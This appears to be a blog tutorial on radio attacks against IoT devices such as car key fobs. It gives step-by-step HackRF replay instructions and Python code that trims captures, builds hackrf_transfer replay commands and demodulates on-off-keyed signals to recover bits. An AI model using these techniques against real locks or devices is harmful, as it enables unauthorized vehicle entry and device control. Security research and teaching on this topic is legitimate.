This is the 4th part of the “IoT – Radio Communication Attack” series. It is important to review the other three articles to have a good understanding of the material covered in this article.

What we will learn – This article covers the various attacks that are possible on the Radio Communications component of an IoT Device. The attack methodology will be further examined, as well as the tools that are used and how the attack can be performed using them. Also, the theory behind the various attacks on Radio Communication will be reviewed.

Radio Communication

Let us first understand what Radio Communication is, so that the attacks on it are easier to follow. Have a look at the image shown below.


The above image shows a car and the key fob used to lock and unlock it. One presses a button on the fob, and the car is locked or unlocked depending on which button was pressed.

When a button is pressed, the fob transmits a short radio burst that encodes a binary message. Recovering that message requires reverse engineering the radio communication, which will be examined in a future article. The message carries the lock/unlock command, so the car locks or unlocks based on the bits it receives.

The following are attacks that can be performed on the Radio Communication component of any IoT Device:

  1. Replay Attack – This is the most prevalent threat, and the easiest to perform: it needs no understanding of the protocol, because the attacker simply records the original transmission and plays it back to the IoT device unchanged. It only works against a receiver that accepts the same fixed message every time; a receiver that uses rolling codes rejects a replayed message.

    Tools Used – HackRF and BladeRF (transmit and receive); RTL-SDR and FUNcube dongle (receive only, so another device is needed to transmit the replay); GQRX, SDR# and URH (software for viewing, recording and analyzing the signal), etc.

    The steps for performing the attack –

    1. Choose the capture device – The transmitted data is captured with a software-defined radio (henceforth referred to as a “tool” in the rest of this article) such as HackRF, RTL-SDR, FUNcube dongle, BladeRF, etc.
    2. Find the transmission frequency – Every IoT device sends and receives its data on a particular frequency, so identifying that frequency is the first thing to do. It can usually be found by looking up the device's FCC ID, which is printed on the device or in its documentation. If no FCC ID is available, scan for it manually: open a waterfall display in GQRX or SDR#, press the button on the device and watch for the burst. The majority of consumer devices communicate in the 313 to 318 MHz range (315 MHz in North America) or at 433.92 MHz.
    3. Tune the hardware device – Once the frequency is known, tune the SDR to it so that the transmission falls inside the captured bandwidth.
    4. Save the data and retransmit it – With the device tuned, press the button, capture the transmission and save it as a raw file on your computer. Transmitting that saved file on the same frequency is the replay attack.

Among all the tools described in this article, the HackRF is the most widely used. Thus, the scope of the article will be restricted to the HackRF tool.

The Replay Attack that is launched by the HackRF is illustrated in the screenshot below:



In the image above, the transmitted data is captured at 433.9 MHz into the raw file named connector.raw.


As illustrated above, the captured raw file (connector.raw) is then transmitted by the HackRF on the same 433.9 MHz channel. This transmission is the actual Replay Attack.

This is how the Replay Attack is launched using the HackRF tool.
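A capture like connector.raw is usually much longer than the fob's burst, because the receiver is left open while the button is pressed. The added example below, which is not code from the article or from the referenced post, locates the burst in a hackrf_transfer capture (interleaved signed 8-bit I/Q samples), trims the file to the burst plus a small margin, and builds the two hackrf_transfer command lines for capture and replay. The sample data is constructed, the 2 MHz sample rate and the gain values are assumptions, and the file names connector.raw and connector_trim.raw are placeholders.

```python
"""Trim a HackRF IQ capture down to the transmitted burst before replaying it.

hackrf_transfer stores a capture as interleaved 8-bit signed I/Q samples.
A capture made by holding the receiver open while the fob button is pressed is
mostly noise with one short burst inside it; replaying only that burst keeps
the transmit window short. All sample data below is constructed, not a real
capture, and the gain values in the commands are assumptions for illustration.
"""
import random
import shlex
from statistics import median


def envelope(iq):
    """Per-sample power I^2 + Q^2 from interleaved signed 8-bit I/Q bytes."""
    s = memoryview(iq).cast("b")  # 'b' = signed char, hackrf_transfer's format
    return [s[i] ** 2 + s[i + 1] ** 2 for i in range(0, len(s) - 1, 2)]


def find_burst(power, ratio=0.25, snr_floor=10):
    """Return (first, last) index of the region above ratio*peak, or None.

    A capture with no burst has its peak close to the median noise power;
    that case is reported as None rather than as a burst spanning the file.
    """
    peak = max(power)
    if peak < snr_floor * max(median(power), 1):
        return None
    threshold = peak * ratio
    hot = [i for i, p in enumerate(power) if p >= threshold]
    return hot[0], hot[-1]


def trim_capture(iq, sample_rate_hz, pad_ms=5.0):
    """Cut the raw capture to the burst plus pad_ms of margin on either side."""
    power = envelope(iq)
    burst = find_burst(power)
    if burst is None:
        raise ValueError("no burst above the noise floor in this capture")
    pad = int(sample_rate_hz * pad_ms / 1000)
    first = max(0, burst[0] - pad)
    last = min(len(power) - 1, burst[1] + pad)
    return bytes(iq[first * 2:(last + 1) * 2])  # 2 bytes (I, Q) per sample


def hackrf_commands(freq_hz, sample_rate_hz, capture_file, replay_file):
    """hackrf_transfer command lines for the capture and the replay.

    -r/-t receive into / transmit from a file, -f frequency, -s sample rate,
    -l LNA gain, -g RX VGA gain, -x TX VGA gain, -a 1 enables the RF amp.
    The gain values are assumptions; tune them for the distance to the device.
    """
    common = ["-f", str(freq_hz), "-s", str(sample_rate_hz)]
    capture = ["hackrf_transfer", "-r", capture_file] + common + ["-l", "32", "-g", "20"]
    replay = ["hackrf_transfer", "-t", replay_file] + common + ["-x", "40", "-a", "1"]
    return shlex.join(capture), shlex.join(replay)


def synthetic_capture(n_samples=20000, burst_start=8000, burst_len=2000, seed=1):
    """Constructed stand-in for connector.raw: weak noise with one carrier burst."""
    rng = random.Random(seed)
    out = bytearray()
    for i in range(n_samples):
        if burst_start <= i < burst_start + burst_len:
            i_val, q_val = 90, 30  # steady carrier while the button is held
        else:
            i_val, q_val = rng.randint(-3, 3), rng.randint(-3, 3)
        out += bytes([i_val & 0xFF, q_val & 0xFF])  # two's complement bytes
    return bytes(out)


if __name__ == "__main__":
    raw = synthetic_capture()
    trimmed = trim_capture(raw, sample_rate_hz=2_000_000, pad_ms=1.0)
    print(f"{len(raw) // 2} samples in, {len(trimmed) // 2} samples out")
    capture_cmd, replay_cmd = hackrf_commands(
        433_900_000, 2_000_000, "connector.raw", "connector_trim.raw")
    print(capture_cmd)
    print(replay_cmd)
```

On a real capture, read connector.raw into bytes, pass it to trim_capture with the sample rate used on the -s flag, write the result to connector_trim.raw and transmit that with the replay command. Keep the sample rate identical for capture and replay; otherwise the burst is played back at the wrong speed and the receiver ignores it.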

  2. Cryptanalysis Attack – This method involves reverse engineering the communication of the IoT device: the captured transmission is demodulated and decoded to recover the binary message it carries. It is harder to perform than a replay, because a crafted message is only accepted if the bits, the modulation technique and the baud rate all match what the receiver expects. If the data or the baud rate differ, the receiver will not decode the message and the attack fails.

    Tools Used – HackRF, CC1111 (the sub-GHz transceiver chip that rfcat drives), RTL-SDR, SDR#, GNU Radio, rfcat, Audacity, etc.

    Steps for performing the attack –

    1. Capture the original data that is transmitted to the IoT device – The procedure is the same as for launching the Replay Attack.
    2. Analyze and process the data – The captured signal is inspected to determine the modulation scheme (on-off keying and frequency-shift keying are the common ones for these devices). It is then demodulated, filtered to remove noise, and measured to find the baud rate, i.e. the duration of one symbol.
    3. Reverse engineer the message – With the modulation scheme and baud rate known, the demodulated signal is turned into a bit string, and the meaning of its fields is worked out. A new message can then be encoded with the same modulation and baud rate and sent to the IoT device to launch the actual attack. This kind of attack is far more involved than a replay.
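The analysis and reverse-engineering steps above, for the on-off keying case, as an added example that is not code from the article: it thresholds the power envelope of an IQ capture into carrier-on/carrier-off runs, takes the shortest run as one symbol period to estimate the baud rate, and expands the runs into a bit string. The capture is constructed from a known bit pattern so the result can be checked; the 2 MHz sample rate, the I/Q amplitudes and the glitch filter width are assumptions.

```python
"""Recover the bit string and baud rate from an OOK (on-off keying) burst.

Most cheap sub-GHz remotes use OOK: carrier on for a 1, carrier off for a 0.
Demodulation then reduces to thresholding the power envelope of the IQ
capture, measuring how long each on/off run lasts, taking the shortest run
as one symbol period, and reading every run as that many repeated bits.
The capture used below is constructed from a known bit pattern, not a
recording of a real device.
"""
import random


def envelope(iq):
    """Per-sample power I^2 + Q^2 from interleaved signed 8-bit I/Q bytes."""
    s = memoryview(iq).cast("b")
    return [s[i] ** 2 + s[i + 1] ** 2 for i in range(0, len(s) - 1, 2)]


def to_levels(power, ratio=0.25):
    """Slice the envelope into 1 (carrier on) / 0 (carrier off) per sample."""
    threshold = max(power) * ratio
    return [1 if p >= threshold else 0 for p in power]


def run_lengths(levels):
    """[(level, count), ...] for each run of identical consecutive levels."""
    runs = []
    for level in levels:
        if runs and runs[-1][0] == level:
            runs[-1] = (level, runs[-1][1] + 1)
        else:
            runs.append((level, 1))
    return runs


def merge_glitches(runs, min_run):
    """Fold runs shorter than min_run samples into their predecessor.

    Noise near the threshold produces one- or two-sample runs that would
    otherwise be mistaken for the symbol period.
    """
    out = []
    for level, count in runs:
        if out and (count < min_run or out[-1][0] == level):
            out[-1] = (out[-1][0], out[-1][1] + count)
        else:
            out.append((level, count))
    return out


def demodulate_ook(iq, sample_rate_hz, ratio=0.25, min_run=3):
    """Return (bits, baud) for a single OOK burst inside an IQ capture.

    Caveat: the shortest run is taken as one symbol. If the message never
    contains an isolated symbol, the estimate is a multiple of the true
    period and the bits come out compressed; check it against the waterfall.
    """
    runs = merge_glitches(run_lengths(to_levels(envelope(iq), ratio)), min_run)
    if runs and runs[0][0] == 0:
        runs = runs[1:]  # silence before the burst is not data
    if runs and runs[-1][0] == 0:
        runs = runs[:-1]  # silence after the burst is not data
    if not runs:
        raise ValueError("no burst found in capture")
    symbol = min(count for _, count in runs)
    bits = "".join(str(level) * round(count / symbol) for level, count in runs)
    return bits, sample_rate_hz / symbol


def synthetic_ook(bits, samples_per_symbol, silence=400, seed=7):
    """Constructed OOK burst: carrier on (I=80, Q=20) for 1, weak noise for 0."""
    rng = random.Random(seed)
    out = bytearray()

    def noise():
        return rng.randint(-3, 3) & 0xFF  # signed value as a two's complement byte

    for _ in range(silence):
        out += bytes([noise(), noise()])
    for bit in bits:
        for _ in range(samples_per_symbol):
            out += bytes([80, 20]) if bit == "1" else bytes([noise(), noise()])
    for _ in range(silence):
        out += bytes([noise(), noise()])
    return bytes(out)


if __name__ == "__main__":
    capture = synthetic_ook("1011001110001", samples_per_symbol=200)
    recovered, baud = demodulate_ook(capture, sample_rate_hz=2_000_000)
    print(f"bits={recovered} baud={baud:.0f}")
```

Real fobs usually repeat the frame several times with a gap between copies; run the demodulator on one copy, or split on the long off-runs first. The recovered bits are the raw on-air symbols, so a second decoding step (for example, Manchester or pulse-width decoding) may still be needed before the fields of the message make sense.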

These are the two types of attack that are most widely carried out on the Radio Communication component of an IoT device. This article has covered the theory behind them; the next one will provide actual examples of both.

References –

https://www.scienceabc.com/innovation/how-does-car-starter-remote-keyless-entry-start-work.html

http://sh3llc0d3r.com/iot-replay-attack-with-hackrf/